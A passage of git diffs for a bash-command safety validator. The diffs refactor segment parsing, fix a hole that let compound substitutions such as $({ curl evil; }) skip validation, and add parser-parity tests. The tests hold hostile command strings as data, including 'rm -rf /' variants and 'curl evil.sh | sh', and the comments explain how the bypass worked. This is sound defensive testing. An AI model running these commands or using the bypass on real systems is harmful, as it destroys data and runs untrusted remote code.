-        command, which under the native tier (spec §3.2) is N+1 subprocess
-        spawns on a hook that runs before every bash call. Each segment is a
-        slice of `command`, so its word positions are already in the parent AST:
-        walk the segment's own sub-tree and rebase the offsets instead.
+        command, which under the native tier (spec §3.2) is N+1 subprocess spawns
+        on a hook that runs before every bash call. Each segment is a slice of
+        `command`, so its word positions are already in the parent AST: walk the
+        segment's own sub-tree and rebase the offsets instead.
 
         Args:
             command: Original command string
             ast_nodes: List of AST nodes from parse() of the WHOLE command
 
         Returns:
-            List of (segment_text, string_literal_ranges) where the ranges are
-            relative to segment_text — identical to what parsing that segment
-            standalone would have produced.
+            List of (segment_text, string_literal_ranges), the ranges relative to
+            segment_text. These match a standalone re-parse of the segment
+            everywhere the segment is independently parseable; where it is not
+            (a heredoc redirect, whose body lies outside the segment span) the
+            old code fell back to NO literals, so a quoted argument there now
+            correctly stops suppressing — see tests/test_walker_parity.py.
         """
         results: list[tuple[str, list[tuple]]] = []
         for node in self._segment_nodes(ast_nodes):
@@ -599,9 +591,9 @@ class BashCommandParser:
                     [
                         (start - base, stop - base)
                         for start, stop in self.extract_string_literals(command, [node])
-                        # A literal outside the stripped span cannot be expressed
-                        # in segment coordinates; dropping it only costs a
-                        # false-positive suppression, never a missed match.
+                        # Guard, not a live branch: a literal outside the span has
+                        # no segment-relative expression. Dropping one only costs
+                        # a false-positive suppression, never a missed match.
                         if start >= base and stop <= end
                     ],
                 )

--- a/src/schlock/core/parser.py
+++ b/src/schlock/core/parser.py
@@ -472,38 +472,22 @@ class BashCommandParser:
 
         return results
 
-    def extract_command_segments(self, command: str, ast_nodes: list[Any]) -> list[str]:
-        """Extract full command segments from pipelines and command lists.
+    def _segment_nodes(self, ast_nodes: list[Any]) -> list[Any]:
+        """Collect the AST nodes that each form one independently-validated segment.
 
-        SECURITY CRITICAL: Returns the full text of each command segment so
-        each can be validated independently. Prevents bypass via piping/chaining
-        dangerous commands after whitelisted ones.
-
-        Args:
-            command: Original command string
-            ast_nodes: List of bashlex AST nodes from parse()
-
-        Returns:
-            List of command segment strings extracted from the AST
-
-        Example:
-            >>> parser = BashCommandParser()
-            >>> ast = parser.parse("ls | rm -rf / && echo done")
-            >>> parser.extract_command_segments("ls | rm -rf / && echo done", ast)
-            ['ls', 'rm -rf /', 'echo done']
+        Shared by extract_command_segments and extract_command_segments_with_literals
+        so both see the same set of segments; a traversal that drifted between the
+        two would validate one set of segments against another set's string
+        literals, silently suppressing rule matches.
         """
-        segments = []
+        nodes: list[Any] = []
 
         def visit(node):  # noqa: PLR0912 - AST traversal requires multiple branches
-            """Recursively visit AST nodes to extract command segments."""
+            """Recursively visit AST nodes to collect command nodes."""
             if hasattr(node, "kind"):
                 # Command nodes contain individual commands
                 if node.kind == "command" and hasattr(node, "pos"):
-                    start, end = node.pos
-                    if start < len(command) and end <= len(command):
-                        segment = command[start:end].strip()
-                        if segment:
-                            segments.append(segment)
+                    nodes.append(node)
                     return  # Don't recurse into command parts
 
                 # Pipeline nodes - visit each command in the pipeline
@@ -539,7 +523,90 @@ class BashCommandParser:
         for node in ast_nodes or []:
             visit(node)
 
+        return nodes
+
+    def _locate_segment(self, command: str, node: Any) -> Optional[tuple[str, int]]:
+        """Return (segment text, its start offset in `command`), or None if unusable.
+
+        The offset is where the STRIPPED text begins, which is what makes
+        segment-relative positions derivable without re-parsing the segment.
+        """
+        start, end = node.pos
+        if start >= len(command) or end > len(command):
+            return None
+        raw = command[start:end]
+        text = raw.strip()
+        if not text:
+            return None
+        return text, start + (len(raw) - len(raw.lstrip()))
+
+    def extract_command_segments(self, command: str, ast_nodes: list[Any]) -> list[str]:
+        """Extract full command segments from pipelines and command lists.
+
+        SECURITY CRITICAL: Returns the full text of each command segment so
+        each can be validated independently. Prevents bypass via piping/chaining
+        dangerous commands after whitelisted ones.
+
+        Args:
+            command: Original command string
+            ast_nodes: List of bashlex AST nodes from parse()
+
+        Returns:
+            List of command segment strings extracted from the AST
+
+        Example:
+            >>> parser = BashCommandParser()
+            >>> ast = parser.parse("ls | rm -rf / && echo done")
+            >>> parser.extract_command_segments("ls | rm -rf / && echo done", ast)
+            ['ls', 'rm -rf /', 'echo done']
+        """
+        segments = []
+        for node in self._segment_nodes(ast_nodes):
+            located = self._locate_segment(command, node)
+            if located is not None:
+                segments.append(located[0])
         return segments
+
+    def extract_command_segments_with_literals(self, command: str, ast_nodes: list[Any]) -> list[tuple[str, list[tuple]]]:
+        """Segments plus their quoted-string ranges, derived from ONE parse.
+
+        PERF/SECURITY: the segment loop in `validate_command` used to re-parse
+        every segment just to recover its string-literal ranges — N+1 parses per
+        command, which under the native tier (spec §3.2) is N+1 subprocess
+        spawns on a hook that runs before every bash call. Each segment is a
+        slice of `command`, so its word positions are already in the parent AST:
+        walk the segment's own sub-tree and rebase the offsets instead.
+
+        Args:
+            command: Original command string
+            ast_nodes: List of AST nodes from parse() of the WHOLE command
+
+        Returns:
+            List of (segment_text, string_literal_ranges) where the ranges are
+            relative to segment_text — identical to what parsing that segment
+            standalone would have produced.
+        """
+        results: list[tuple[str, list[tuple]]] = []
+        for node in self._segment_nodes(ast_nodes):
+            located = self._locate_segment(command, node)
+            if located is None:
+                continue
+            text, base = located
+            end = base + len(text)
+            results.append(
+                (
+                    text,
+                    [
+                        (start - base, stop - base)
+                        for start, stop in self.extract_string_literals(command, [node])
+                        # A literal outside the stripped span cannot be expressed
+                        # in segment coordinates; dropping it only costs a
+                        # false-positive suppression, never a missed match.
+                        if start >= base and stop <= end
+                    ],
+                )
+            )
+        return results
 
     def reconstruct_command(self, ast_nodes: list[Any]) -> str:
         """Reconstruct command from AST word nodes.

--- a/src/schlock/core/substitution.py
+++ b/src/schlock/core/substitution.py
@@ -867,9 +867,18 @@ class SubstitutionValidator:
         # Dropping it here would silently skip validation -> fail OPEN. Per-segment logic blocks
         # the unrenderable segment instead. Non-list substitutions with no extractable command
         # stay dropped (genuinely unparseable).
+        #
+        # `compound` earns the same protection, and for the same reason. $({ curl evil; }) and
+        # $( ( curl evil ) ) render to None because a compound's first child is a reservedword
+        # with no `.parts`, so this guard dropped the WHOLE substitution and curl was never
+        # validated -> ALLOW, while the bare $(curl evil) BLOCKs. Retaining the node lets
+        # _has_dangerous_inner_structure's "compound command in substitution" check fire.
+        # Found by the LAB-912 expert panel; the hole predates the native tier (bashlex emits
+        # `compound` for `{ … }` too) and widened to every clause once T2c mapped
+        # if/while/for/case/functions onto `compound`.
         cmd_node = getattr(node, "command", None)
-        is_list = getattr(cmd_node, "kind", None) == "list"
-        if not inner_command and not is_list:
+        keeps_structure = getattr(cmd_node, "kind", None) in ("list", "compound")
+        if not inner_command and not keeps_structure:
             return None
 
         base_command = self._extract_base_command(node)

--- a/src/schlock/core/substitution.py
+++ b/src/schlock/core/substitution.py
@@ -871,8 +871,14 @@ class SubstitutionValidator:
         # `compound` earns the same protection, and for the same reason. $({ curl evil; }) and
         # $( ( curl evil ) ) render to None because a compound's first child is a reservedword
         # with no `.parts`, so this guard dropped the WHOLE substitution and curl was never
-        # validated -> ALLOW, while the bare $(curl evil) BLOCKs. Retaining the node lets
-        # _has_dangerous_inner_structure's "compound command in substitution" check fire.
+        # validated -> ALLOW, while the bare $(curl evil) BLOCKs. Retaining the node blocks
+        # through TWO mechanisms, and both must survive a refactor: a bashlex `{ … }` compound
+        # has no resolvable base_command (its first `.list` child is a reservedword with no
+        # `.parts`), so validate_substitution's final "Cannot determine command" branch denies
+        # it; a native clause compound ($(if true; then …; fi)) DOES resolve a base command,
+        # and when that command is whitelisted the block comes from
+        # _check_structural_and_nested -> _has_dangerous_inner_structure's "compound command
+        # in substitution" check instead.
         # Found by the LAB-912 expert panel; the hole predates the native tier (bashlex emits
         # `compound` for `{ … }` too) and widened to every clause once T2c mapped
         # if/while/for/case/functions onto `compound`.

--- a/src/schlock/core/validator.py
+++ b/src/schlock/core/validator.py
@@ -878,10 +878,8 @@ def validate_command(  # noqa: PLR0911, PLR0912, PLR0915 - Complex validation fl
             # SECURITY CRITICAL: Extract and validate each command segment independently
             # This prevents bypass via piping/chaining dangerous commands after whitelisted ones
             # e.g., "ls | rm -rf /" should NOT be allowed just because "ls" is whitelisted
-            # Each segment carries the string-literal ranges derived from the
-            # SAME parse (spec §3.2 parse-once): the per-segment re-parse this
-            # replaces cost N+1 parses per command, i.e. N+1 subprocess spawns
-            # once the native tier is wired in (T8).
+            # Literal ranges come from the SAME parse — see the method's docstring
+            # for why the per-segment re-parse had to go (spec §3.2 parse-once).
             segments_with_literals = parser.extract_command_segments_with_literals(command, ast)
 
             # Track all matched rules for audit logging (used when multiple segments)

--- a/src/schlock/core/validator.py
+++ b/src/schlock/core/validator.py
@@ -878,13 +878,17 @@ def validate_command(  # noqa: PLR0911, PLR0912, PLR0915 - Complex validation fl
             # SECURITY CRITICAL: Extract and validate each command segment independently
             # This prevents bypass via piping/chaining dangerous commands after whitelisted ones
             # e.g., "ls | rm -rf /" should NOT be allowed just because "ls" is whitelisted
-            segments = parser.extract_command_segments(command, ast)
+            # Each segment carries the string-literal ranges derived from the
+            # SAME parse (spec §3.2 parse-once): the per-segment re-parse this
+            # replaces cost N+1 parses per command, i.e. N+1 subprocess spawns
+            # once the native tier is wired in (T8).
+            segments_with_literals = parser.extract_command_segments_with_literals(command, ast)
 
             # Track all matched rules for audit logging (used when multiple segments)
             all_matched_rules = []
 
             # If we have multiple segments, validate each one
-            if len(segments) > 1:
+            if len(segments_with_literals) > 1:
                 # Full-command whitelist check before segment validation.
                 # Per-segment validation cannot detect safe multi-command patterns
                 # (e.g., "gh auth token | docker login ... --password-stdin") because
@@ -907,14 +911,7 @@ def validate_command(  # noqa: PLR0911, PLR0912, PLR0915 - Complex validation fl
                 highest_risk = RiskLevel.SAFE
                 highest_match = None
 
-                for segment in segments:
-                    # Parse segment to get its string literals
-                    try:
-                        seg_ast = parser.parse(segment)
-                        seg_literals = parser.extract_string_literals(segment, seg_ast)
-                    except (ParseError, ValueError):
-                        seg_literals = []
-
+                for segment, seg_literals in segments_with_literals:
                     seg_match = engine.match_command(segment, string_literals=seg_literals)
 
                     if seg_match.matched and seg_match.rule:

--- a/tests/test_ast_view.py
+++ b/tests/test_ast_view.py
@@ -18,8 +18,10 @@ import json
 import pytest
 
 from schlock.core.ast_view import (
+    _CLAUSE_CHILDREN,
     BASHLEX_KINDS,
     BINARY_OPS,
+    EXPR_OPERANDS,
     MVDAN_NODE_MAP,
     AstView,
     UnmappedNodeError,
@@ -59,6 +61,21 @@ class TestMappingTableIsData:
             produced.add(separator)
         assert produced == BASHLEX_KINDS
         assert len(BASHLEX_KINDS) == 12
+
+    def test_clause_handlers_agree_with_the_node_map(self):
+        # The two tables hold the same contract from opposite ends, and drift
+        # produces a MISLEADING error: a key only in _CLAUSE_CHILDREN raises
+        # "malformed typed-JSON structure: KeyError" and blames the binary for a
+        # table bug. Pin them together (LAB-912 panel finding).
+        for node_type in _CLAUSE_CHILDREN:
+            assert MVDAN_NODE_MAP[node_type] == ("compound", "list"), node_type
+
+    def test_expression_operand_table_has_no_empty_rows(self):
+        # An empty tuple would make _expr_words return [] instead of raising —
+        # the silent-drop the fail-closed contract forbids. `Word` is the leaf and
+        # is handled before the lookup, so it must not appear here.
+        assert "Word" not in EXPR_OPERANDS
+        assert all(EXPR_OPERANDS.values())
 
     def test_pipe_is_not_pipeline(self):
         # `|`/`|&` build a `pipeline` whose separator kind is `pipe`;
@@ -451,11 +468,12 @@ class TestUnmappedRaises:
             view("(( x++ ))")
 
     @needs_binary
-    def test_coprocess_statement_raises(self):
+    def test_coprocess_raises(self):
         # `coproc` runs the command behind its own pipes — a shape bashlex has no
-        # node for. Matches either guard: bash mode emits a `CoprocClause`
-        # command, while the `Coprocess` statement flag covers the mksh spelling.
-        with pytest.raises(UnmappedNodeError, match="Coproc"):
+        # node for. It arrives as a CoprocClause COMMAND, so the clause table is
+        # what rejects it (`Stmt.Coprocess` is the mksh `|&` spelling, which this
+        # bash-mode CLI never emits).
+        with pytest.raises(UnmappedNodeError, match="CoprocClause"):
             view("coproc a { sleep 1; }")
 
     @needs_binary

--- a/tests/test_ast_view.py
+++ b/tests/test_ast_view.py
@@ -441,17 +441,28 @@ class TestUnmappedRaises:
         assert issubclass(UnmappedNodeError, NativeBridgeError)
 
     @needs_binary
-    def test_if_clause_unmapped_for_now(self):
-        # IfClause is outside the 12-kind vocabulary — T2c decides its shape.
-        # Until then it must raise (→ bashlex tier), never silently map.
-        with pytest.raises(UnmappedNodeError, match="IfClause"):
-            view("if true; then a; fi")
+    def test_arithmetic_command_unmapped(self):
+        # `(( … ))` stays unmapped by choice, not by omission: bashlex parses it
+        # but calls the arithmetic body a COMMAND named after the expression, so
+        # a superset-preserving mapping would have to copy that misparse. It is
+        # not one of the 7 bashlex-failing constructs, so the fallback tier costs
+        # nothing here. See _clause_expression and tests/test_walker_parity.py.
+        with pytest.raises(UnmappedNodeError, match="ArithmCmd"):
+            view("(( x++ ))")
+
+    @needs_binary
+    def test_coprocess_statement_raises(self):
+        # `coproc` runs the command behind its own pipes — a shape bashlex has no
+        # node for. Matches either guard: bash mode emits a `CoprocClause`
+        # command, while the `Coprocess` statement flag covers the mksh spelling.
+        with pytest.raises(UnmappedNodeError, match="Coproc"):
+            view("coproc a { sleep 1; }")
 
     @needs_binary
     def test_negated_statement_raises(self):
-        # Dropping `!` would silently invert pipeline semantics; bashlex
-        # handles negation today, so route it to the fallback tier.
-        with pytest.raises(UnmappedNodeError, match="egated"):
+        # Dropping `!` would defeat substitution.py's deliberate fail-closed on a
+        # negated pipeline (`_is_valid_pipeline_topology`). See convert_stmt.
+        with pytest.raises(UnmappedNodeError, match="Negated"):
             view("! a")
 
     @needs_binary

--- a/tests/test_ast_view.py
+++ b/tests/test_ast_view.py
@@ -463,7 +463,7 @@ class TestUnmappedRaises:
         # but calls the arithmetic body a COMMAND named after the expression, so
         # a superset-preserving mapping would have to copy that misparse. It is
         # not one of the 7 bashlex-failing constructs, so the fallback tier costs
-        # nothing here. See _clause_expression and tests/test_walker_parity.py.
+        # nothing here. See _clause_test and tests/test_walker_parity.py.
         with pytest.raises(UnmappedNodeError, match="ArithmCmd"):
             view("(( x++ ))")
 

--- a/tests/test_walker_parity.py
+++ b/tests/test_walker_parity.py
@@ -309,20 +309,33 @@ class TestParameterExpansionSubstitutions:
         for command in ("echo ${z:-fallback}", "echo ${#z}", "echo ${!z}", "echo ${z}", "echo $z"):
             assert not _get_substitution_validator().extract_substitutions(NativeBridge().parse(command))
 
+    def test_expansion_words_create_no_literal_suppression_ranges(self):
+        # A quoted default spliced as a generic `word` node would register as a
+        # quoted-literal range and MASK rule matches on its content — bashlex's
+        # childless `parameter` node creates no such range, so this is the
+        # under-block direction (PR #137 review).
+        command = 'echo ${z:-"rm -rf /"}'
+        assert BashCommandParser().extract_string_literals(command, NativeBridge().parse(command)) == []
+
 
 class TestDeepNestingRoutesToFallback:
-    """A converter stack overflow is a BRIDGE failure, not a verdict.
+    """A bridge-side stack overflow is a BRIDGE failure, not a verdict.
 
-    bashlex parses ~350 levels of nesting; the recursive converter blows the
-    Python stack first. Escaping as a bare RecursionError would skip T5's router
-    and hard-deny input the fallback tier handles fine.
+    bashlex parses ~350 levels of nesting; the bridge blows the Python stack
+    first — in the recursive converter, or (3.9) already inside the json
+    decoder. Escaping as a bare RecursionError would skip T5's router and
+    hard-deny input the fallback tier handles fine. The `__cause__` assertion
+    pins the recursion path: without it a healthy bridge that merely rejects
+    the input (any NativeBridgeError) would keep this test green without ever
+    exercising the fail-closed contract it documents.
     """
 
     @needs_binary
     def test_recursion_error_becomes_a_native_bridge_error(self):
         command = "if true; then " * 400 + "rm -rf /" + "; fi" * 400
-        with pytest.raises(NativeBridgeError):
+        with pytest.raises(NativeBridgeError) as excinfo:
             NativeBridge().parse(command)
+        assert isinstance(excinfo.value.__cause__, RecursionError), excinfo.value
 
 
 @needs_binary

--- a/tests/test_walker_parity.py
+++ b/tests/test_walker_parity.py
@@ -1,0 +1,337 @@
+"""Walker-output parity + parse-once segments (LAB-409 T2c).
+
+Slice T2c wires `AstView` into BOTH walker families and proves the native tier
+sees *at least* as much danger as bashlex does. Two gates carry the weight:
+
+1. **Output parity, superset direction.** Parseability is necessary but not
+   sufficient (spec §9 T2): a native AST that parses `case ... esac` while
+   producing FEWER command segments than bashlex is a silent under-block. Every
+   construct in the 24-entry corpus is run through all four detection outputs on
+   both tiers and the native result must be a superset. Superset, not equality,
+   because mvdan/sh parses seven constructs bashlex cannot — there the native
+   tier legitimately reveals more (spec §4).
+2. **Parse once.** The pre-T2c hot path parsed the whole command, then re-parsed
+   every segment to recover its string literals (`validator.py:913`) — N+1
+   parses, which under the native tier is N+1 subprocess spawns. Segment string
+   literals are now derived from the parent AST's sub-nodes, so the spawn count
+   is 1 per command regardless of pipeline length.
+
+Unescape (`rm\\ -rf\\ /`), byte→char offsets, ANSI-C `$'…'` decoding and the
+full `validate_command` differential oracle stay with T3; the tests at the
+bottom pin those as still-fail-closed so a future widening cannot land silently.
+"""
+
+import json
+import subprocess
+from pathlib import Path
+
+import pytest
+
+from schlock.core.ast_view import UnmappedNodeError
+from schlock.core.native_bridge import NativeBridge, NativeBridgeError, resolve_binary
+from schlock.core.parser import BashCommandParser
+from schlock.core.validator import _get_substitution_validator, clear_caches, validate_command
+
+CORPUS_PATH = Path(__file__).parent.parent / "tools" / "schlock-parse" / "testdata" / "corpus.json"
+
+
+def _binary_available():
+    try:
+        resolve_binary()
+    except NativeBridgeError:
+        return False
+    return True
+
+
+needs_binary = pytest.mark.skipif(
+    not _binary_available(),
+    reason="no vendored schlock-parse binary for this platform",
+)
+
+CORPUS = json.loads(CORPUS_PATH.read_text())
+
+#: The constructs bashlex cannot parse at all (corpus `bashlex_fails`). Native
+#: coverage of these IS the migration's payoff, so a regression to
+#: `UnmappedNodeError` here must fail the build rather than quietly degrade to
+#: the fallback tier (spec §9 T2 acceptance 1).
+NATIVE_ONLY_CONSTRUCTS = [entry["name"] for entry in CORPUS if entry["bashlex_fails"]]
+
+#: Corpus constructs the native tier still hands to bashlex, each with the slice
+#: that owns it. The parity gate consults this allowlist instead of skipping on
+#: any raise: otherwise a regression that made `if`/`for`/`case` fail closed
+#: again would look identical to a documented ceiling, and the gate would go
+#: quiet exactly when it mattered.
+KNOWN_FALLBACK_CEILINGS = {
+    "escaped-space-word": "T3 — per-WordPart backslash unescape (spec §4a)",
+    "ansi-c-quoting": "T3 — ANSI-C decoding; bashlex under-decodes, so T3's oracle rules",
+    "comments-and-blank-lines": "CLI parses comments off, so a trailing one reads as a prefix parse",
+    "arith-command": "bashlex misreads `(( … ))` as a command named after the expression",
+}
+
+
+def walker_outputs(command: str, ast_nodes: list) -> "dict[str, set]":
+    """Run all four detection walkers over `ast_nodes`, as comparable sets.
+
+    Sets, not lists: parity is about WHAT was detected, and bashlex's traversal
+    order is not a contract either walker family relies on.
+    """
+    parser = BashCommandParser()
+    sub_validator = _get_substitution_validator()
+    return {
+        "segments": set(parser.extract_command_segments(command, ast_nodes)),
+        "dangerous_constructs": set(parser.has_dangerous_constructs(ast_nodes)),
+        "commands_with_args": {(name, tuple(args)) for name, args in parser.extract_commands_with_args(ast_nodes)},
+        "substitutions": {
+            (sub.substitution_type.name, sub.inner_command, sub.base_command)
+            for sub in sub_validator.extract_substitutions(ast_nodes)
+        },
+    }
+
+
+def native_outputs(command: str) -> "dict[str, set]":
+    return walker_outputs(command, NativeBridge().parse(command))
+
+
+def bashlex_outputs(command: str) -> "dict[str, set] | None":
+    """Walker outputs on the bashlex tier, or None if bashlex cannot parse."""
+    parser = BashCommandParser()
+    try:
+        return walker_outputs(command, parser.parse(command))
+    except Exception:  # noqa: BLE001 - any bashlex failure means "no baseline to compare against"
+        return None
+
+
+@needs_binary
+class TestCorpusOutputParity:
+    """Native detection output ⊇ bashlex detection output, over the corpus."""
+
+    @pytest.mark.parametrize("entry", CORPUS, ids=[e["name"] for e in CORPUS])
+    def test_native_output_is_superset_of_bashlex(self, entry):
+        command = entry["script"]
+        try:
+            native = native_outputs(command)
+        except (UnmappedNodeError, NativeBridgeError) as exc:
+            # A raise routes to the bashlex tier, which by definition matches
+            # itself — but only a construct on the documented ceiling list may
+            # take that exit.
+            assert entry["name"] in KNOWN_FALLBACK_CEILINGS, f"undocumented native-tier regression: {exc}"
+            return
+
+        baseline = bashlex_outputs(command)
+        if baseline is None:
+            pytest.skip("bashlex cannot parse this construct; no parity baseline")
+        for output, expected in baseline.items():
+            missing = expected - native[output]
+            assert not missing, f"{output}: native tier missed {missing} that bashlex found"
+
+    @pytest.mark.parametrize("name", NATIVE_ONLY_CONSTRUCTS)
+    def test_bashlex_failing_constructs_convert(self, name):
+        """The 7 constructs bashlex rejects must produce an AstView, not a raise."""
+        command = next(e["script"] for e in CORPUS if e["name"] == name)
+        assert native_outputs(command) is not None
+
+    @pytest.mark.parametrize(
+        "name",
+        [
+            "conditional-double-bracket",
+            "array-assignment",
+            "arithmetic-expansion",
+            "function-definition",
+            "case-statement",
+            "for-loop",
+            "if-statement",
+        ],
+    )
+    def test_t2c_widened_constructs_no_longer_raise(self, name):
+        """Constructs T2b deferred to T2c convert instead of failing closed."""
+        command = next(e["script"] for e in CORPUS if e["name"] == name)
+        NativeBridge().parse(command)
+
+
+@needs_binary
+class TestDangerousVariantsReachTheWalkers:
+    """Parseability is not the gate — the danger must be VISIBLE to a walker.
+
+    One dangerous variant per newly-mapped construct (spec §4): a construct that
+    parses but hides its `rm -rf /` from every walker is strictly worse than one
+    that raises, because the fallback tier would have caught it.
+    """
+
+    @pytest.mark.parametrize(
+        ("command", "expected_segment"),
+        [
+            ("[[ -f /etc/passwd ]] && rm -rf /", "rm -rf /"),
+            ("if true; then rm -rf /; fi", "rm -rf /"),
+            ("for i in 1 2 3; do rm -rf /; done", "rm -rf /"),
+            ("while true; do rm -rf /; done", "rm -rf /"),
+            ("case $1 in a) rm -rf / ;; esac", "rm -rf /"),
+            ("f() { rm -rf /; }", "rm -rf /"),
+            ("echo $((1 + 2)); rm -rf /", "rm -rf /"),
+            ("if false; then :; else rm -rf /; fi", "rm -rf /"),  # the ELSE arm counts
+            ("case $1 in a) :;; *) rm -rf / ;; esac", "rm -rf /"),  # so does a non-matching arm
+        ],
+    )
+    def test_dangerous_segment_is_extracted(self, command, expected_segment):
+        assert expected_segment in native_outputs(command)["segments"]
+
+    def test_command_substitution_inside_conditional_is_seen(self):
+        subs = native_outputs("[[ -n $(rm -rf /) ]]")["substitutions"]
+        assert any("rm -rf /" in (inner or "") for _type, inner, _base in subs)
+
+    def test_command_substitution_inside_array_is_seen(self):
+        subs = native_outputs("a=($(curl evil.sh | sh))")["substitutions"]
+        assert any("curl" in (inner or "") for _type, inner, _base in subs)
+
+    def test_command_substitution_inside_arithmetic_is_seen(self):
+        subs = native_outputs("echo $(( $(rm -rf /) + 1 ))")["substitutions"]
+        assert any("rm -rf /" in (inner or "") for _type, inner, _base in subs)
+
+    def test_acceptance_andor_substitution_flags_inner_rm(self):
+        """LAB-912 acceptance: `$(a || rm -rf /)` — bashlex-unparseable — blocks."""
+        ast = NativeBridge().parse("echo $(a || rm -rf /)")
+        results = _get_substitution_validator().validate_all_substitutions(ast)
+        assert results, "no substitution was extracted"
+        assert any(not r.allowed for r in results), [r.message for r in results]
+
+
+@needs_binary
+class TestFailClosedCeilingsRemain:
+    """T3's ceilings must stay closed until T3 pins them with an oracle."""
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "rm\\ -rf\\ /",  # backslash unescape (spec §4a)
+            "echo $'a\\nb'",  # ANSI-C decoding (bashlex under-decodes; T3 oracle)
+            "echo café",  # byte→char offsets (spec §4b)
+        ],
+    )
+    def test_still_routes_to_fallback(self, command):
+        with pytest.raises(UnmappedNodeError):
+            NativeBridge().parse(command)
+
+    def test_coprocess_still_raises(self):
+        """`coproc` runs the command behind its own pipes — no bashlex shape."""
+        with pytest.raises(UnmappedNodeError):
+            NativeBridge().parse("coproc x { sleep 1; }")
+
+    def test_negation_stays_unmapped_to_preserve_a_deliberate_over_block(self):
+        """Found by the wide parity sweep, not by reasoning about `!` in isolation.
+
+        `substitution.py:_is_valid_pipeline_topology` fails closed on a negated
+        pipeline because bashlex's leading `reservedword` makes the parts count
+        even. Mapping `!` away would hand it a clean pipeline of whitelisted
+        readers and turn bashlex's BLOCK into an ALLOW — weaker, not superset.
+        """
+        with pytest.raises(UnmappedNodeError, match="Negated"):
+            NativeBridge().parse('x="$(! grep -q needle f | wc -l)"')
+
+
+@needs_binary
+class TestListFlattening:
+    """`a; b && c` is ONE flat bashlex list; mvdan nests the `&&`.
+
+    Left nested, the inner `list` lands in a segment slot that
+    `_render_segment_text` cannot render, so a legitimate all-whitelisted chain
+    is blocked. Fail-closed, but a false block bashlex does not produce.
+    """
+
+    def test_mixed_separators_flatten_like_bashlex(self):
+        parser = BashCommandParser()
+        native = parser.extract_commands_with_args(NativeBridge().parse("pwd; ls && ls"))
+        assert native == parser.extract_commands_with_args(parser.parse("pwd; ls && ls"))
+
+    def test_whitelisted_mixed_chain_in_substitution_is_not_falsely_blocked(self):
+        command = "echo $(pwd; ls && ls)"
+        native = _get_substitution_validator().validate_all_substitutions(NativeBridge().parse(command))
+        bashlex = _get_substitution_validator().validate_all_substitutions(BashCommandParser().parse(command))
+        assert [r.allowed for r in native] == [r.allowed for r in bashlex]
+
+    def test_inner_command_text_survives_flattening(self):
+        subs = native_outputs("echo $(a; b && c)")["substitutions"]
+        assert subs == {("COMMAND", "a ; b && c", "a")}
+
+
+@needs_binary
+class TestKnownBashlexUnderDecode:
+    """One divergence the sweep found where native is RIGHT and bashlex is wrong.
+
+    Pinned so T3 inherits it instead of rediscovering it: this is exactly why
+    spec §4 specifies a superset oracle rather than an equality one — an equality
+    gate would pressure the native tier into copying bashlex's decoder bugs.
+
+    It is safe to diverge here. The mangling needs an adjacent literal, so the
+    mangled word always carries that literal too and can never collapse to a bare
+    dangerous command; bashlex's dropped quotes only ever REVEAL text bash would
+    not run. Keeping the quotes loses no danger, it drops a false positive.
+    """
+
+    def test_single_quotes_concatenated_with_a_literal(self):
+        # bash's value for `'a"b'x` is `a"bx`; bashlex drops the inner quotes
+        # whenever a SglQuoted part is concatenated with a Lit.
+        parser = BashCommandParser()
+        command = "echo 'a\"b'x"
+        assert parser.extract_commands_with_args(parser.parse(command)) == [("echo", ["abx"])]
+        assert parser.extract_commands_with_args(NativeBridge().parse(command)) == [("echo", ['a"bx'])]
+
+
+class TestParseOnce:
+    """One parse per command — the segment loop must not re-parse (spec §3.2)."""
+
+    def test_validate_command_parses_exactly_once(self, monkeypatch):
+        clear_caches()
+        calls = []
+        real_parse = BashCommandParser.parse
+
+        def counting_parse(self, command):
+            calls.append(command)
+            return real_parse(self, command)
+
+        monkeypatch.setattr(BashCommandParser, "parse", counting_parse)
+        validate_command('grep "needle" file.txt | wc -l')
+        assert calls == ['grep "needle" file.txt | wc -l'], f"re-parsed segments: {calls[1:]}"
+
+    @needs_binary
+    def test_native_tier_spawns_one_process_per_command(self, monkeypatch):
+        spawns = []
+        real_popen = subprocess.Popen
+
+        def counting_popen(*args, **kwargs):
+            spawns.append(args[0])
+            return real_popen(*args, **kwargs)
+
+        monkeypatch.setattr(subprocess, "Popen", counting_popen)
+        command = 'grep "needle" file.txt | wc -l'
+        ast = NativeBridge().parse(command)
+        segments = BashCommandParser().extract_command_segments_with_literals(command, ast)
+        assert len(segments) == 2
+        assert len(spawns) == 1, f"{len(spawns)} spawns for one command"
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            'grep "needle" file.txt | wc -l',
+            "ls | rm -rf / && echo done",
+            "echo 'quoted' ; cat file",
+            "cmd > out.log 2>&1",
+            'git commit -m "fix: thing" && git push',
+        ],
+    )
+    def test_derived_literals_match_a_per_segment_reparse(self, command):
+        """The derived offsets must equal what the replaced re-parse produced.
+
+        This is the refactor's safety net: string literals SUPPRESS rule matches,
+        so an offset that drifts left turns a real match into a false negative.
+        """
+        parser = BashCommandParser()
+        ast = parser.parse(command)
+        for segment, literals in parser.extract_command_segments_with_literals(command, ast):
+            expected = parser.extract_string_literals(segment, parser.parse(segment))
+            assert literals == expected, f"segment {segment!r}"
+
+    def test_segment_text_is_unchanged_by_the_refactor(self):
+        parser = BashCommandParser()
+        command = "ls | rm -rf / && echo done"
+        ast = parser.parse(command)
+        with_literals = parser.extract_command_segments_with_literals(command, ast)
+        assert [text for text, _literals in with_literals] == parser.extract_command_segments(command, ast)

--- a/tests/test_walker_parity.py
+++ b/tests/test_walker_parity.py
@@ -124,26 +124,16 @@ class TestCorpusOutputParity:
             missing = expected - native[output]
             assert not missing, f"{output}: native tier missed {missing} that bashlex found"
 
-    @pytest.mark.parametrize("name", NATIVE_ONLY_CONSTRUCTS)
-    def test_bashlex_failing_constructs_convert(self, name):
-        """The 7 constructs bashlex rejects must produce an AstView, not a raise."""
-        command = next(e["script"] for e in CORPUS if e["name"] == name)
-        assert native_outputs(command) is not None
-
     @pytest.mark.parametrize(
         "name",
-        [
-            "conditional-double-bracket",
-            "array-assignment",
-            "arithmetic-expansion",
-            "function-definition",
-            "case-statement",
-            "for-loop",
-            "if-statement",
-        ],
+        sorted(
+            set(NATIVE_ONLY_CONSTRUCTS)
+            | {"function-definition", "case-statement", "for-loop", "if-statement"} - set(KNOWN_FALLBACK_CEILINGS)
+        ),
     )
-    def test_t2c_widened_constructs_no_longer_raise(self, name):
-        """Constructs T2b deferred to T2c convert instead of failing closed."""
+    def test_widened_constructs_convert(self, name):
+        """Must produce an AstView, not a raise — the constructs bashlex rejects
